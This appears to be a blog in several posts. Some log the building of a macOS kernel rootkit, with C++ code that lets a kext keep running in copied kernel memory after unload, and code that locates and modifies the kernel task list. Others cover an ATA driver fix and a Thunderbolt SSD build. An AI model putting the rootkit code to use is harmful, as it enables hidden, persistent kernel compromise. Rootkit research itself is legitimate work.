        printf("[ZOMBIE] Could not allocate memory for symbol nodes\n");
        return KERN_MEMORY_FAILURE;
    }
    
    Kernel* kernel = Kernel::kernel();
    if(!kernel)
    {
        printf("[ZOMBIE] Cannot resolve kernel symbols\n");
        return KERN_MEMORY_FAILURE;
    }
    
    PointerNode* lastSymbolAddressNode = NULL;
    bool error = false;
    
    const char* currentSymbol = sm_symbolNames[0];
    for(int i = 0; currentSymbol != NULL; currentSymbol = sm_symbolNames[++i] )
    {
        void* ptr = (void*)kernel->resolveSymbol(currentSymbol);
        if(!ptr)
        {
            error = true;
            break;
        }
        
        PointerNode* symbolAddressNode = PointerNode::alloc();
        if(!symbolAddressNode)
        {
            error = true;
            break;
        }
        *symbolAddressNode = ptr;
        
        // Important to keep the order for later mappings !!
        if(lastSymbolAddressNode == NULL)
            sm_symbolAddresses->insertHead(symbolAddressNode);
        else
            sm_symbolAddresses->insertAfter(symbolAddressNode, lastSymbolAddressNode);
        
        lastSymbolAddressNode = symbolAddressNode;
        symbolAddressNode->release();
    }
    if(error)
    {
        sm_symbolAddresses->release();
        sm_symbolAddresses = NULL;
        kernel->release();
        
        printf("[ZOMBIE] error resolving external symbols or allocating nodes for it\n");
        
        return KERN_FAILURE;
    }
    
    kernel->release();
    kernel = NULL;
    
    // 2) Get Kext base address and its minimum memory size
    
    sm_kextBaseAddress = (mach_vm_address_t) Kext::getBaseAddress();
    if(!sm_kextBaseAddress)
    {
        printf("[ZOMBIE] Could not get Kext base address\n");
        return KERN_FAILURE;
    }
    
    struct segment_command_64* textSegment = Kext::getTextSegment();
    struct segment_command_64* dataSegment = Kext::getDataSegment();
    
    if(!textSegment || !dataSegment)
    {
        printf("[ZOMBIE] Could not get Kext segments\n");
        return KERN_FAILURE;
    }
    
    sm_kextSize = textSegment->vmsize + dataSegment->vmsize;
    
    // 3) Calculate the distance to the thread_continue_t we use to wakup the zombie 
    sm_wakeupDistance = ((mach_vm_address_t)ZombieMode::wakeup) - sm_kextBaseAddress;
    
    printf("[ZOMBIE] Wakeup distance: %p\n", (void*)sm_wakeupDistance);
    
    // 4) Allocate memory for the zombie and copy the kext into it
    
    sm_zombieMemory = _MALLOC(sm_kextSize, M_TEMP, M_WAITOK);
    if(!sm_zombieMemory)
    {
        printf("[ZOMBIE] Could not allocate memory\n");
        return KERN_MEMORY_FAILURE;
    }
    
    
    Cpu::disableInterrupts();
    Cpu::setWriteProtection(Cpu::WriteProtectionDisabled);

    memcpy(sm_zombieMemory, (const void*)sm_kextBaseAddress, sm_kextSize);

    Cpu::setWriteProtection(Cpu::WriteProtectionEnabled);
    Cpu::enableInterrupts();
    
    // 5) Make the zombie memory executable
    
    task_lock(kernel_task);


    vm_prot_t memProtection = VM_PROT_EXECUTE | VM_PROT_READ;
    
    VmMap* kernelMap = VmMap::kernelMap();
    if(!kernelMap)
    {
        printf("[ZOMBIE] Could not get kernel vm_map\n");

        task_unlock(kernel_task);
        return KERN_FAILURE;
    }
    
    
    
    // 1st try mach_vm_protect
    kern_return_t kr = kernelMap->setProtection((mach_vm_address_t)sm_zombieMemory, sm_kextSize, memProtection);
    if(kr != KERN_SUCCESS)
    {
        printf("[ZOMBIE] Could not set memory protection\n");
        
        // 2nd try vm_map_protect
        kr = kernelMap->setMachProtection((mach_vm_address_t)sm_zombieMemory, sm_kextSize, memProtection);                      
        if(kr != KERN_SUCCESS)
        {
            printf("[ZOMBIE] Could not set memory protection (2nd try)\n");
            
            kernelMap->release();
            task_unlock(kernel_task);
            
            return KERN_FAILURE;
        }
    }
    
    vm_prot_t newProtection = kernelMap->getProtection(sm_zombieMemory, sm_kextSize);
    printf("[ZOMBIE] Protection of Zombie Memory: %s\n", vmprottoa(newProtection));

    kernelMap->release();
    task_unlock(kernel_task);    
    
    // 6) Get xrefs for all external symbols in our kext

    CrossReferences* xrefs = CrossReferences::xrefs();
    if(!xrefs)
    {
        printf("[ZOMBIE] Could not allocate CrossReferences\n");
        return KERN_FAILURE;
    }
        

    
    xrefs->setInstructionTypes( (_InstructionType[]){ I_JMP, I_CALL, I_LEA } , 3);
    xrefs->setSearchStartAddress(sm_kextBaseAddress);
    xrefs->setSearchEndAddress(sm_kextBaseAddress + sm_kextSize);
    
    

    List* xrefsList = xrefs->searchForSymbols(sm_symbolAddresses);
    // Just test with printf() 
    //xrefs->searchForSymbol( (mach_vm_address_t)printf );
    
    sm_symbolAddresses->release();
    sm_symbolAddresses = NULL;
    
    xrefs->release();
    
    if(!xrefsList || xrefsList->getCount() < 1)
    {
        printf("[ZOMBIE] No CrossReferences found.\n");
        SafeRelease(xrefsList);
        
        return KERN_FAILURE;
    }
    
    // 7) Patch all xrefs
    
    int leaHooks = 0;
    int jmpHooks = 0;
    int callHooks = 0;
    
    InstructionHook* hook;
    mach_vm_address_t zombieBaseAddress = (mach_vm_address_t)sm_zombieMemory;
    XRefNode* xrefNode;
    List_foreach(xrefsList, xrefNode)
    {
        struct xref* xref = *xrefNode;
        switch(xref->instructionType)
        {
            case I_LEA:
            {
                hook = LeaInstructionHook::hook();
                leaHooks++;
            } break;
            case I_CALL:
            {
                hook = CallInstructionHook::hook();
                callHooks++;
            } break;
            case I_JMP:
            {
                hook = JmpInstructionHook::hook();
                jmpHooks++;
            } break;
            default:
            {
                hook = NULL;
                printf("[ZOMBIE] Unsupported xfref detected!");
            } break;    
        };
        
        if(hook)
        {
         
            mach_vm_address_t xrefDistance = xref->address - sm_kextBaseAddress;
            mach_vm_address_t addressInZombie = zombieBaseAddress + xrefDistance;
            
        
            
            hook->setAddress(addressInZombie, xref->size, xref->symbol);
            hook->setDeactivateOnFree(false);
            hook->activate();
            hook->release();
            hook = NULL;
        }
    }
    
    printf("[ZOMBIE] No. of hooks LEA: %d JMP: %d CALL: %d\n", leaHooks, jmpHooks, callHooks);
    
    xrefsList->release();
    xrefsList = NULL;
    
    // 8) Calculate where ZombieMode::wakeup() will be in sm_zombieMemory and create a new thread to call it
    thread_continue_t zombieWakeup = (thread_continue_t)(((mach_vm_address_t)sm_zombieMemory) + sm_wakeupDistance);
    
    printf("[ZOMBIE] Zombie Base: %p Wakeup: %p Distance: %p\n", (void*)zombieBaseAddress, zombieWakeup, (void*)((mach_vm_address_t)zombieWakeup - zombieBaseAddress));
    
    printf("[ZOMBIE] Kext Base: %p Wakeup: %p Distance: %p\n", (void*)sm_kextBaseAddress, (void*)ZombieMode::wakeup, (void*)((mach_vm_address_t)ZombieMode::wakeup - sm_kextBaseAddress));

    thread_t zombieThread;
    kr = kernel_thread_start(zombieWakeup, NULL, &zombieThread);
    thread_deallocate(zombieThread);
    
    if(kr != KERN_SUCCESS)
    {
        printf("[ZOMBIE] Could not start a new kernel thread\n");
        return kr;
    }
    
    
    printf("[ZOMBIE] until here all went good\n");
    return KERN_SUCCESS;
}



void ZombieMode::wakeup(void *parameter, wait_result_t x)
{
    printf("[ZOMBIEMODE] !!\n");
    
    clock_delay_until(mach_absolute_time() + 15 * NSEC_PER_SEC);

    mach_vm_address_t base = (mach_vm_address_t)sm_zombieMemory;
    
    #ifdef DEBUG
    char buff[32];
    bzero(buff, 32);
    snprintf(buff, 31, "addkext: %p", sm_zombieMemory);
    BREAKPOINT(buff);
    // We can debug the Zombie just a like any other kext 
    #endif //DEBUG
    
    VmMap* map = VmMap::kernelMap();
    if(map)
    {
        printf("[ZOMBIEMODE] map: %p sm_instancecount: %p\n", map, &VmMap::sm_instanceCount);

        
        vm_prot_t prot = map->getProtection(base, sm_kextSize);
        
        printf("[ZOMBIEMODE] Zombie Mem vm_prot: %s\n", vmprottoa(prot));
        
        map->release();
        
    }

    
    printf("[ZOMBIEMODE] debug kernel: %d\n", Kernel::isDebugBuild() ? 1 : 0);
        
    
    ZombieMode::terminate();
}

But to be honest, one big problem remains.

C++ makes life easier and sometimes much harder

Since my Rootkit is written in C++ from scratch to make my life easier and the code more readable I must admit that Zombie Mode only works with one big hack. I have to completely disable all vtables for all classes. In other words, no virtual methods are possible which leads to leaking memory at the moment since nearly all my classes need at least a virtual destructor to be freed correctly.

When a Kext is loaded KXLD initializes all vtables at runtime. So just copying the Kext’s memory to a new location and patching xrefs is not enough, all vtables will have dangling pointers after the Kext is unloaded and we run in Zombie Mode. So my next step will be to patch all vtables.

Reasearch so far

Since the memory layout for a C++ vtable is implementation specific I started by finding what ABI is used in Mac OS X 64bit. It’s the Itanium C++ ABI. Next I investigated kxld_vtable.c, code of the kernel dynamic loader aka KXLD. But the journey isn’t over yet, still not sure how to patch it. So stay tuned. For those of you who are more interested in vtables, I read good articles about it A Basic Glance at the virtual table. And about c++ object memory layout for clang on linux, Dumping a C++ Objects memory layout .

I hope I can patch my class’es vtables soon so the memory leaking destruction of objects is fixed.

Special I/O Kit Family for Stuck ATA Controllers: IOATAFamily.kext

-

Did you ever encounter this error in your system.log:

IOATAController device blocking bus.

If you’ve seen that, you probably have a malfunctioning hard disk drive and soon after that you encounter data loss and/or a runtime corrupted hfs drive.

In my case the malfunctioning device is in my Dell D630 hackintosh. I use a MediaBay enclosure that can take a Serial ATA 2.5” HDD plugged into the Dell’s parrallel ATA/IDE bus. But from time to time the MediaBay drive makes me crazy by blocking the bus. The only fix until today was to restart the machine asap after reading the above log or my data will be corrupted which made me mad.

First I thought the hard drive is going to die. So I put in one of my brand new spare drives. But, the problem remained. So I took the old drive put it into an USB housing and ran a complete test and the the result was as expected: HDD is fine!

So I had to investigate further since I wanted to fix that. My thought was, which driver logs the error ? It must be either the I/O Kit Family, IOATAController.kext, or the one implementing the family, in my case AppleIntelPIIXATA.kext. Since there is no source code for the latter I downloaded the former one from http://opensource.apple.com and searched for the log message.

And found it in this function:

IOATAFamily/IOATAController.cppIOATAController.cpp
IOReturn
IOATAController::handleExecIO( void )
{
    IOReturn err = kATANoErr;
    
    // select the desired device
    // don't start the IOTimer until after selection as there are no
    // generation counts in the IOTimerEventSource. Device Selection will honor 
    // the timeout value in ms on its own.
    err = selectDevice( _currentCommand->getUnit() );
    if( err )
    {    
        IOLog("IOATAController device blocking bus.\n");
        _currentCommand->state = IOATAController::kATAComplete;

        if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
        {
            completeIO( kIOReturnOffline );    
            return kIOReturnOffline;    
        }
        
        startTimer( 1000 );  // start a 1 second timeout so that we can unwind the stack if the bus is stuck.
        return kATANoErr;  // defer error handling to the timer thread. 
    }

    // start the IO Timer
    startTimer( _currentCommand->getTimeoutMS() );


    // go to asyncIO and start the state machine.
    // indicate the command has been issued
    _currentCommand->state = IOATAController::kATAStarted;        
    if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
    {
        err = synchronousIO();
    } else {
        err = asyncIO();
    }
        
    // return success and pend IRQ for further operation or completion.
    
    return err;

}

The device is blocking the bus. What can we do now? Reset the bus and luckily for us Apple implemented a method doing a software reset.

IOATAFamily/IOATAController.hIOATAController.h
class IOATAController : public IOService
{
    OSDeclareDefaultStructors(IOATAController);
public:
// ...

virtual IOReturn softResetBus( bool doATAPI = false );

// ...
};

The only thing left was to find out how to supply the correct parameter. See my version of the handleExecIO() method how I did that:

Modified method
IOReturn
IOATAController::handleExecIO( void )
{
    IOReturn err = kATANoErr;
    
    // select the desired device
    // don't start the IOTimer until after selection as there are no
    // generation counts in the IOTimerEventSource. Device Selection will honor 
    // the timeout value in ms on its own.
    err = selectDevice( _currentCommand->getUnit() );
    if( err )
    {    
        IOLog("IOATAController device blocking bus.\n");

        _currentCommand->state = IOATAController::kATAComplete;

        // DO NOT reset bus if we are not IRQ driven
        
        if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
        {
            completeIO( kIOReturnOffline );    
            IOLog("IOATAController return Offline.\n");
            return kIOReturnOffline;    
        }
        
        // FIX - BEGIN
        
        IOLog("IOATAController soft resetting bus.\n");
        
        bool isATAPIReset = ((_currentCommand->getFlags() & mATAFlagProtocolATAPI) != 0);
        softResetBus(isATAPIReset);
        
        // Increased time so soft bus reset is  done
        startTimer( 2000 );  // start a 2 second timeout so that we can unwind the stack if the bus is stuck.
        
        IOLog("IOATAController started a 2 second timer because the bus is stuck.\n");

        // FIX - END
        
        return kATANoErr;  // defer error handling to the timer thread. 
    }

    // start the IO Timer
    startTimer( _currentCommand->getTimeoutMS() );


    // go to asyncIO and start the state machine.
    // indicate the command has been issued
    _currentCommand->state = IOATAController::kATAStarted;        
    if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
    {
        err = synchronousIO();
    } else {
        err = asyncIO();
    }
        
    // return success and pend IRQ for further operation or completion.
    
    return err;
}

This did the trick for me. The HDD is now working as expected again and no more system reboots and data corruption.

If you like to you can download my version of the I/O Kit Family. It is signed so it can be placed in /Library/Extensions and will be loaded instead of the one in /System/Library/Extensions since I increased the bundle version from 2.5.2 to 3.5.2.

Thunderbolt SSD for Testing

-

Since my storage needs are growing with each Release of OS X I decided to invest some money into external storage to store my virtual machines and the corresponding snaphots.

Since my 13-inch MacBook Pro Early 2011 does not have USB 3.0 the only choices left are FireWire (800Mbps) or Thunderbolt (10Gbps). At first I decided to daisy chain 2 FireWire drives and use them as a RAID with mode 0 which would effectivle get me near SATA 1st generation speed. But after investigation on devices availables, I found out that daisy chaining disks is not really supported at all, so a hub would be needed, but prices are way too high for the delivered perfomance either for the hub or disks I would need. A simple 3 port hub, costs around 70,- € which is very expensive compared to USB 2.0 or a competing 3.0 one.

So a Thunderbolt SSD was the way to go. The market is also not huge and prices are also relatively high, but you get much so much more performance for your money. My primary candidates were:

LaCie Rugged

LaCie SSD

A LaCie Rugged 120GB SSD which looks awful, the orange is really bad for my colour-blind eyes, but nevertheless the performance of this drive is said to be really good so I kept it on my list. The price currently is:

185,- €

Elgato

Elgato SSD

So next one was a Elgate 120GB SSD which was eliminated from my list after I found out that the used drive is SATA 2nd generation (3Gbps) which is less then a third of what Thunderbolt is capable of. So no chance that I would buy this drive. Even the price my retailer told me was horrible:

300,- €

Buffalo MiniStation

Buffalo MiniStation

The 3rd candidate I found was Buffalo MiniStation 128GB SSD which looks really nice and all reviews I have read about it promised great performance. So this drive was the one I wanted to buy. But as life sometimes is, it was sold out everywhere I looked for it and the next delivery would be not sooner than 21 days after order. Bad luck. By the way, the price for the drive was:

205,- €

Self-made solution

So I was looking for alternatives again and stumbled over this YouTube Video. It shows how to disassemble a Buffalo MiniStation drive. But the drive used in the video was not a SSD it was a HDD. Until this point in time I did not look for Thunderbolt HDDs only SSDs. So after some investigation I can definetly tell you that the Buffalo MiniStation 500GB is currently the cheapest thunderbolt solution on the market and a great choice for putting your own SSD into it. But be aware that you maybe void your warranty if something goes horribly wrong. Everything is done on your own risk. I am not responsible for it.

So I checked if the 500GB model of the MiniStation is availbale at my retailers store and it was. Priced at:

140,- €

Great. So what I needed next was a cheap but good SSD, this was easy for me. I chose a Samsung 840 Evo because I already have a 840 Evo running in my MacBook and it is damn great. The 120GB model costs around:

70,- €

So my solution will be 210,- € total. Which is a bit more than the LaCie or the Buffalo SSD but you can use exactly the SSD you prefer most.

When the 2 products where delivered I immediately swapped out the disk in the Buffalo MiniStation as described in the video and put in the Samsung SSD even before plugging in the HDD once. After reassembling the MiniStation I plugged in the thunderbolt cable for the first time and yeah it was working as expected. So here are some screenshots how Mavericks detected it:

Screenshot

Screenshot

Performance Test

As you can imagine the next thing I wanted to see, guess what, was performance. The standard applications used for measuring disk performance on a Mac are Blackmagic Disk Speed Test and AJA System Test. The former one can be download from the Mac App Store . For the other one please use google since I don’t know, at the moment, where I got it from but it should be free. Filesize used was 2GB.

Samsung 840 Evo 250GB SATA 6Gbps

Black Magic Internal AJA Test Internal

Samsung 840 evo 120GB Thunderbolt Buffalo MiniStation

Black Magic Thunderbolt AJA Test Thunderbolt

Last Comment

I’m loving my new blazing fast external storage and can recommend my self-made solution to everybody who needs a cheap thunderbold ssd of choice.

And last but not least I have already begun setting up all the Virtual Machines, one for 10.9, 10.9.1, 10.9.2, 10.9.2 with Security Update 002-2014 and 10.9.3 that I need to test my Heroine Anti-Rootkit Rootkit with.

Implementing Access to the Task_t List 2/2

-

Okay I finally managed to start the integration of the tasks list.

As in the previous article, it is not hard to get the symbol. Just resolve it from the mach_kernel binary on disk and add the KASLR slide to it.

So we have the symbol, and seen the macros and functions used to modify the list. But Housten we hava a problem. We do not want to use struct task definitions copied from some version of the XNU source, if Apple changes something in there our code would break. Since struct task is not public KPI, Apple can do that without problems. But for our work to be done we need the field tasks in the

Struct

XNU/osfmk/kern/task.hXNU Source Tree
struct task {
    /* Synchronization/destruction information */
    decl_lck_mtx_data(,lock)        /* Task's lock */
    uint32_t    ref_count;    /* Number of references to me */
    boolean_t    active;        /* Task has not been terminated */
    boolean_t    halting;    /* Task is being halted */

    /* Miscellaneous */
    vm_map_t    map;        /* Address space description */
    queue_chain_t    tasks;    /* global list of tasks */
    void        *user_data;    /* Arbitrary data settable via IPC */

    /* Threads in this task */
    queue_head_t        threads;

    processor_set_t        pset_hint;
    struct affinity_space    *affinity_space;

    int            thread_count;
    uint32_t        active_thread_count;
    int            suspend_count;    /* Internal scheduling only */
    ...
};

So what we need is a function, the most generic we can find, that references this field and use a disassembler to get the offset.

After searching for some time, I must admit there is not really a good candidate available that can be easily abused for out purpose. In the end my choice fell to this

Function

XNU/osfmk/kern/task.hXNU Source Tree
kern_return_t
task_create_internal(
    task_t        parent_task,
    boolean_t    inherit_memory,
    boolean_t    is_64bit,
    task_t        *child_task)
{
    // ...
    // Most code ommitted
    // ...

    bzero(&new_task->extmod_statistics, sizeof(new_task->extmod_statistics));
    new_task->task_timer_wakeups_bin_1 = new_task->task_timer_wakeups_bin_2 = 0;
    lck_mtx_lock(&tasks_threads_lock);
    queue_enter(&tasks, new_task, task_t, tasks);
    tasks_count++;
    lck_mtx_unlock(&tasks_threads_lock);

    if (vm_backing_store_low && parent_task != NULL)
        new_task->priv_flags |= (parent_task->priv_flags&VM_BACKING_STORE_PRIV);

    new_task->task_volatile_objects = 0;

    ipc_task_enable(new_task);

    *child_task = new_task;
    return(KERN_SUCCESS);
}

The field is accessed after lck_mtx_lock(&tasks_threads_lock). So what we will do is look for a CALL instruction that references tasks_threads_lock.

Disassembly

_AssemblyOpcodeOperands
1E8383D0900call_lck_mtx_lock
2488D0579DA6800learax, qword [ds:_tasks]
3488B4808 mov rcx, qword [ds:rax+0x8]
44839C1 cmp rcx, rax
57406 je 0xffffff800023d33e
648895928 mov qword [ds:rcx+0x28], rbx
7EB03 jmp 0xffffff800023d341
8488918 mov qword [ds:rax], rbx
948894B30 mov qword [ds:rbx+0x30], rcx
1048894328 mov qword [ds:rbx+0x28], rax
1148895808 mov qword [ds:rax+0x8], rbx
12488D05A4DA6800 lea rax, qword [ds:_tasks_count]
13FF00 inc dword [ds:rax]
14488D3DA3DA6800 lea rdi, qword [ds:_tasks_threads_lock]
15E8FE420900 call _lck_mtx_unlock

Algorithmus

We need either the instruction No. 6 or 10 so how will we do that as dynamically as possible so small changes to the function won’t break our code ? At first we search the disassembly for the CALL to lck_mtx_lock followed by a LEA which targets tasks since we know that symbol we can compare against it. Now we have something to start with. The hard part follows. Since we have 2 references of the offset we have 2 code paths. The first one searches for a JMP after our start within the next 10 instruction and if there’s a MOV RCX,RBX before it we will use it and are done. If that doesn’t work, we search the next 5 instructions for MOV RBX,RAX after the JMP if that won’t work we give up since the function probably changed to much for our algorithmus to still apply.

The described method works for all 10.9 RELEASE mach_kernel’s that are officially released. DEBUG version is bit different. Here is the code for it:

Task.cppRepository
bool Task::decompose_tasks_offset_callback(_DInst *decodedInstructions, unsigned int i, unsigned int maxIndex)
{
    bool shouldStop = false;
    
    if(decodedInstructions[i].opcode == I_CALL &&
       INSTRUCTION_GET_TARGET( &decodedInstructions[i]) == (mach_vm_address_t)lck_mtx_lock &&
       i + 1 < maxIndex &&
       decodedInstructions[i + 1].opcode == I_LEA &&
       decodedInstructions[i + 1].ops[0].type == O_REG
      )
    {                
        if(INSTRUCTION_GET_TARGET(&decodedInstructions[i + 1] != (mach_vm_address_t)tasks) 
        {
            shouldStop = true;
            return shouldStop;
        }
        
        // Search for the JMP and get the offset from its previous instruction
        for(unsigned int j = 2; j < 12 && i + j < maxIndex; j++)
        {

            if(decodedInstructions[i + j].opcode == I_JMP)
            {            
                unsigned int indexOfJMP = i + j;

                if(decodedInstructions[indexOfJMP - 1].opcode == I_MOV &&
                   decodedInstructions[indexOfJMP - 1].ops[0].index == R_RCX &&
                   decodedInstructions[indexOfJMP - 1].ops[0].type == O_SMEM &&
                   decodedInstructions[indexOfJMP - 1].ops[1].type == O_REG &&
                   decodedInstructions[indexOfJMP - 1].ops[1].index == R_RBX
                   )
                {
                    tasks_offset = (uint32_t)decodedInstructions[indexOfJMP - 1].disp;                                        
                    shouldStop = true;
                    break;
                }

                // Try to find offset after the JMP
                for(unsigned int k = j + 1; k < j + 5 && i + k < maxIndex; k++)
                {
                    if(decodedInstructions[i + k].opcode == I_MOV &&
                       decodedInstructions[i + k].ops[0].type == O_SMEM &&
                       decodedInstructions[i + k].ops[0].index == R_RBX &&
                       decodedInstructions[i + k].ops[1].type == O_REG &&
                       decodedInstructions[i + k].ops[1].index == R_RAX)
                    {
                                               
                        tasks_offset = (uint32_t)decodedInstructions[i + k].disp;
                        shouldStop = true;
                        break;
                    }
                }
                shouldStop = true;
                break;
                
            }
        }
    }
    
    
    return shouldStop;    
}

That’s it. We now have a reliable way of accessing the tasks list and the tasks field in the underlying struct of a task_t. Modifying the list is now also possible.

Waiting for Task_t Implementation…

-

Sorry guys that the second article about the task_t list is not released yet. But I had some trouble with the Shadow Syscall Table I implemented in Heroine. If you want to know what a Syscall Shadow Table is, you can read an interesting article about it here.

I was hunting bugs the last 3 days, but did not finally found why a kernel panic() happens when the Shadow Table is undone.

The panic() is triggered from unix_syscall64() and I think it is due to a Race Condition. I assume this because there is no panic() when I defer _FREE()‘ing the Shadow Table’s memory long enough.

So the implementation to access the of the task_t list had to wait. I hope I can go back to it today soon.